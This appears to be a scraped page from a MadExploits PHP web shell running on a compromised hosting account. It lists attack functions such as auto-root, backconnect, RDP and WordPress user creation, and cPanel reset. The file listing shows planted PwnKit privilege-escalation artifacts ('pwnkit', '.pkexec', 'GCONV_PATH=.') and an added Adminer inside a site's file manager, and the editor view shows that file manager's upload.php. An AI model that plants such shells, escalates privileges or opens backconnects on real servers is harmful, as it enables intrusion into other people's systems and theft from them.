Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
admin0504 /
filemanager /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwx---r-x
css
[ DIR ]
drwx---r-x
img
[ DIR ]
drwx---r-x
include
[ DIR ]
drwx---r-x
jPlayer
[ DIR ]
drwx---r-x
js
[ DIR ]
drwx---r-x
lang
[ DIR ]
drwx---r-x
uploader
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
LICENSE
289
B
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
ajax_calls.php
9.39
KB
-rw----r--
dialog.php
42.6
KB
-rw----r--
execute.php
9.14
KB
-rw----r--
force_download.php
806
B
-rw----r--
index.php
1.29
KB
-rw----r--
plugin.js
1.8
KB
-rw----r--
plugin.min.js
1.3
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
upload.php
5.89
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upload.php
<?php include 'config/config.php'; if ($_SESSION['verify'] != 'RESPONSIVEfilemanager') { die('Forbidden'); } include 'include/utils.php'; $_POST['path'] = $current_path.str_replace("\0", '', $_POST['path']); $_POST['path_thumb'] = $thumbs_base_path.str_replace("\0", '', $_POST['path_thumb']); $storeFolder = $_POST['path']; $storeFolderThumb = $_POST['path_thumb']; $path_pos = strpos($storeFolder, $current_path); $thumb_pos = strpos($_POST['path_thumb'], $thumbs_base_path); if ($path_pos === false || $thumb_pos === false || preg_match('/\.{1,2}[\/|\\\]/', $_POST['path_thumb']) !== 0 || preg_match('/\.{1,2}[\/|\\\]/', $_POST['path']) !== 0) { die('wrong path'); } $path = $storeFolder; $cycle = true; $max_cycles = 50; $i = 0; while ($cycle && $i < $max_cycles) { $i++; if ($path == $current_path) { $cycle = false; } if (file_exists($path.'config.php')) { require_once $path.'config.php'; $cycle = false; } $path = fix_dirname($path).'/'; } if (!empty($_FILES) && isset($_FILES['file']) && $_FILES['file']['size']) { $info = pathinfo($_FILES['file']['name']); if (isset($info['extension']) && in_array(fix_strtolower($info['extension']), $ext) && in_array(mime_content_type($_FILES['file']['tmp_name']), $mime) ) { $tempFile = $_FILES['file']['tmp_name']; $targetPath = $storeFolder; $targetPathThumb = $storeFolderThumb; $_FILES['file']['name'] = fix_filename($_FILES['file']['name'], $transliteration); $file_name_splitted = explode('.', $_FILES['file']['name']); array_pop($file_name_splitted); $_FILES['file']['name'] = implode('-', $file_name_splitted).'.'.$info['extension']; if (file_exists($targetPath.$_FILES['file']['name'])) { $i = 1; $info = pathinfo($_FILES['file']['name']); while (file_exists($targetPath.$info['filename'].'_'.$i.'.'.$info['extension'])) { $i++; } $_FILES['file']['name'] = $info['filename'].'_'.$i.'.'.$info['extension']; } $targetFile = $targetPath.$_FILES['file']['name']; $targetFileThumb = $targetPathThumb.$_FILES['file']['name']; if (in_array(fix_strtolower($info['extension']), $ext_img) && @getimagesize($tempFile) != false) { $is_img = true; } else { $is_img = false; } if ($is_img) { move_uploaded_file($tempFile, $targetFile); chmod($targetFile, 0755); $memory_error = false; if (!create_img_gd($targetFile, $targetFileThumb, 122, 91)) { $memory_error = false; } else { if (!new_thumbnails_creation($targetPath, $targetFile, $_FILES['file']['name'], $current_path, $relative_image_creation, $relative_path_from_current_pos, $relative_image_creation_name_to_prepend, $relative_image_creation_name_to_append, $relative_image_creation_width, $relative_image_creation_height, $fixed_image_creation, $fixed_path_from_filemanager, $fixed_image_creation_name_to_prepend, $fixed_image_creation_to_append, $fixed_image_creation_width, $fixed_image_creation_height)) { $memory_error = false; } else { $imginfo = getimagesize($targetFile); $srcWidth = $imginfo[0]; $srcHeight = $imginfo[1]; if ($image_resizing) { if ($image_resizing_width == 0) { if ($image_resizing_height == 0) { $image_resizing_width = $srcWidth; $image_resizing_height = $srcHeight; } else { $image_resizing_width = $image_resizing_height * $srcWidth / $srcHeight; } } elseif ($image_resizing_height == 0) { $image_resizing_height = $image_resizing_width * $srcHeight / $srcWidth; } $srcWidth = $image_resizing_width; $srcHeight = $image_resizing_height; create_img_gd($targetFile, $targetFile, $image_resizing_width, $image_resizing_height); } //max resizing limit control $resize = false; if ($image_max_width != 0 && $srcWidth > $image_max_width) { $resize = true; $srcHeight = $image_max_width * $srcHeight / $srcWidth; $srcWidth = $image_max_width; } if ($image_max_height != 0 && $srcHeight > $image_max_height) { $resize = true; $srcWidth = $image_max_height * $srcWidth / $srcHeight; $srcHeight = $image_max_height; } if ($resize) { create_img_gd($targetFile, $targetFile, $srcWidth, $srcHeight); } } } if ($memory_error) { //error unlink($targetFile); header('HTTP/1.1 406 Not enought Memory', true, 406); exit(); } } else { move_uploaded_file($tempFile, $targetFile); chmod($targetFile, 0755); } } else { header('HTTP/1.1 406 file not permitted', true, 406); exit(); } } else { header('HTTP/1.1 405 Bad Request', true, 405); exit(); } if (isset($_POST['submit'])) { $query = http_build_query( array( 'type' => $_POST['type'], 'lang' => $_POST['lang'], 'popup' => $_POST['popup'], 'field_id' => $_POST['field_id'], 'fldr' => $_POST['fldr'], ) ); header('location: dialog.php?'.$query); }
Close
